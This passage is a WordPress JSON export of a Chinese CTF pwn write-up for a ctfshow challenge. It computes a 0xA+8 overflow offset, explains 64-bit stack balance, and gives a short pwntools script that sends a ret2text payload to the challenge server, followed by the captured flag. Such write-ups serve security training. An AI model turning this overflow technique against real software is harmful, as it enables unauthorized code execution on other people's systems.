                  • [rbp-Ah]<\/code> \u8868\u793a buf<\/code> \u4ece\u57fa\u5740\u6307\u9488\uff08rbp<\/code>\uff09\u5f00\u59cb\u5411\u524d\u504f\u79fb10\u4e2a\u5b57\u8282\uff08Ah<\/code>\u662f\u5341\u516d\u8fdb\u5236\u8868\u793a\uff0c\u7b49\u4e8e\u5341\u8fdb\u5236\u768410\uff09\u3002<\/li>\n<\/ul>\n\n\n\n
                    \u5982\u679c\u6211\u4eec\u5047\u8bbe buf<\/code> \u662f\u5728\u6808\u5e27\u7684\u9876\u90e8\u5b9a\u4e49\u7684\uff0c\u90a3\u4e48 buf<\/code> \u5230\u6808\u5e95\u7684\u8ddd\u79bb\u5c31\u662f buf<\/code> \u5230 rbp<\/code> \u7684\u8ddd\u79bb\uff0c\u537310\u4e2a\u5b57\u8282\u3002\u8fd9\u662f\u56e0\u4e3a rbp<\/code> \u6307\u5411\u6808\u5e27\u7684\u5f00\u59cb\uff0c\u800c buf<\/code> \u4ece rbp<\/code> \u5411\u524d\u504f\u79fb10\u4e2a\u5b57\u8282\u3002<\/p>\n\n\n\n
                    64 \u4f4d\u7a0b\u5e8f\u52a0\u4e0a 8 \u5b57\u8282\u7684\u6808\u5e95\uff08rbp\uff09<\/p>\n\n\n\n
                    \u6240\u4ee5\u6700\u540e\u7684\u586b\u5145\u5185\u5bb9\u662f\uff080xA+8\uff09<\/p>\n\n\n\n
                    \u7531\u4e8e\u662f64\u4f4d\u7684\u7a0b\u5e8f<\/p>\n\n\n\n
                    \u6240\u4ee5\u9700\u8981\u8fdb\u884c\u5806\u6808\u5e73\u8861<\/p>\n\n\n\n
                    \n
                    \u5806\u6808\u5e73\u8861\uff1a<\/p>\n\n\n\n
                    \u5f53\u6211\u4eec\u5728\u5806\u6808\u4e2d\u8fdb\u884c\u5806\u6808\u7684\u64cd\u4f5c\u7684\u65f6\u5019\uff0c\u4e00\u5b9a\u8981\u4fdd\u8bc1\u5728 ret \u8fd9\u6761\u6307\u4ee4\u4e4b\u524d\uff0cesp \u6307\u5411\u7684\u662f\u6211\u4eec\u538b\u5165\u6808\u4e2d\u7684\u5730\u5740\uff0c\u51fd\u6570\u6267\u884c\u5230 ret \u6267\u884c\u4e4b\u524d\uff0c\u5806\u6808\u6808\u9876\u7684\u5730\u5740 \u4e00\u5b9a\u8981\u662f call \u6307\u4ee4\u7684\u4e0b\u4e00\u4e2a\u5730\u5740\u3002<\/p>\n<\/blockquote>\n\n\n\n
                    \u56e0\u6b64\u6211\u4eec\u8fd8\u9700\u8981\u627e\u4e00\u4e2a\u5730\u5740\uff1a lev \u7684\u5730\u5740\u6216\u8005\u8be5\u51fd\u6570\u7ed3\u675f\u7684\u5730\u5740\uff08\u5373 retn \u7684\u5730\u5740\uff09<\/p>\n\n\n\n
                    \u7528lev\u7684\u5730\u5740\u5c31\u662f\u4e0a\u8ff0exp\u6240\u5448\u73b0\u7684<\/p>\n\n\n\n
                    \u8fd8\u53ef\u4ee5\u6362\u7528retn\u7684\u5730\u5740\u7f16\u5199exp<\/p>\n\n\n\n
                    \"\"<\/div><\/figure>\n\n\n\n
                    \u6240\u4ee5\u51fa\u73b0<\/p>\n\n\n\n
                    \u6cd5\u2161<\/p>\n\n\n\n
                    exp\uff1a<\/p>\n\n\n\n
                    from pwn import *
                    sh=remote('pwn.challenge.ctf.show',28248)
                    payload=b'a'*(0xA+8)+p64(0x40066D)+p64(0x400657)
                    sh.sendline(payload)
                    sh.interactive()<\/pre>\n\n\n\n
                    \n
                    ctfshow{395fc7ae-28be-466a-9e84-bde2ed678e4e}<\/p>\n<\/blockquote>\n\n\n\n
                    \u5806\u6808\u5e73\u8861\uff1a<\/h2>\n\n\n\n
                    \u542b\u4e49\u5c31\u662f \u5f53\u51fd\u6570\u5728\u4e00\u6b65\u6b65\u6267\u884c\u7684\u65f6\u5019 \u4e00\u76f4\u5230ret\u6267\u884c\u4e4b\u524d\uff0c\u5806\u6808\u6808\u9876\u7684\u5730\u5740 \u4e00\u5b9a\u8981\u662fcall\u6307\u4ee4\u7684\u4e0b\u4e00\u4e2a\u5730\u5740\u3002<\/p>\n\n\n\n
                    \u4e5f\u5c31\u662f\u8bf4\u51fd\u6570\u6267\u884c\u524d\u4e00\u76f4\u5230\u51fd\u6570\u6267\u884c\u7ed3\u675f\uff0c\u51fd\u6570\u91cc\u9762\u7684\u5806\u6808\u662f\u8981\u4fdd\u6301\u4e0d\u53d8\u7684\u3002<\/p>\n\n\n\n
                    \u5982\u679c\u5806\u6808\u53d8\u5316\u4e86\uff0c\u90a3\u4e48\uff0c\u8981\u5728ret\u6267\u884c\u524d\u5c06\u5806\u6808\u6062\u590d\u6210\u539f\u6765\u7684\u6837\u5b50\u3002<\/p>\n\n\n\n
                    \u7b2c\u4e00\u79cd\u60c5\u51b5\uff1apush\u5f71\u54cd\u5806\u6808<\/p>\n\n\n\n
                    \u6bd4\u5982 call …<\/p>\n\n\n\n
                    \u51fd\u6570\uff1amov … (\u4e0d\u5f71\u54cd\u5806\u6808\u5e73\u8861)<\/p>\n\n\n\n
                    \u3000push….. \uff08\u5f71\u54cd\u5806\u6808\u5e73\u8861\uff09<\/p>\n\n\n\n
                    ret…..<\/p>\n\n\n\n
                    \u7b2c\u4e8c\u79cd\u60c5\u51b5\uff1a\u5806\u6808\u4f20\u9012\u53c2\u6570<\/p>\n\n\n\n
                    \"\"<\/div><\/figure>\n\n\n\n
                    ……<\/p>\n\n\n\n
                    \"\"<\/div><\/figure>\n\n\n\n
                    \u5806\u6808\u5982\u4e0b\uff1a<\/p>\n\n\n\n
                    \"\"<\/div><\/figure>\n\n\n\n
                    \u56e0\u4e3aPUSH 1 PUSH 2 \u662f\u4e3a\u4e86\u51fd\u6570\u4f20\u53c2\u800c\u51c6\u5907\u7684 \uff0c\u5f53\u51fd\u6570\u6267\u884c\u5b8c\u6210\u540e \uff0cpush1\uff0cpush2 \u5c31\u90fd\u6ca1\u7528\u4e86\uff0c\u6240\u4ee5\u8981\u628a\u5806\u6808\u6062\u590d\u5230\u6267\u884c\u524d\u7684\u4f4d\u7f6e<\/p>\n\n\n\n
                    \u4e24\u79cd\u89e3\u51b3\u529e\u6cd5 \uff1a\u51fd\u6570\u5916\u90e8\u5904\u7406\u548c\u5185\u90e8\u5904\u7406<\/p>\n\n\n\n
                    \u7b2c\u4e00\u79cd \uff1a\u5728\u51fd\u6570\u5916\u90e8\u6dfb\u52a0ADD\u5904\u7406<\/p>\n\n\n\n
                    \"\"<\/div><\/figure>\n\n\n\n
                    \u7b2c\u4e8c\u79cd\uff1a\u5728\u51fd\u6570\u5185\u90e8\u6dfb\u52a0<\/p>\n\n\n\n
                    \"\"<\/div><\/figure>\n\n\n\n
                    ret 8 \u662f\u628a ret \u548c\u7b2c\u4e00\u79cd\u60c5\u51b5\u7684add \u4e24\u6761\u6307\u4ee4\u6574\u5408\u6210\u4e00\u6761\u6307\u4ee4\uff0c\u5728\u51fd\u6570\u5185\u90e8\u5b8c\u6210\u5806\u6808\u5e73\u8861\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"
                    ATTACK\u7eed alert \u8fdb\u5165\u9898\u76ee\u73af\u5883\uff0c\u5f97\u5230\u7684\u662f\u4e00\u4e2a\u7a7a\u767d\u9875\u9762\uff0c\u53ea\u6709\u4e00\u4e2a\u63d0\u793a\u6846\u5728\u53cd\u590d\u51fa\u73b0 \u7528view-sour […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-210","post","type-post","status-publish","format-standard","hentry","category-ctf"],"_links":{"self":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/210","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=210"}],"version-history":[{"count":0,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/210\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=210"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=210"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=210"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}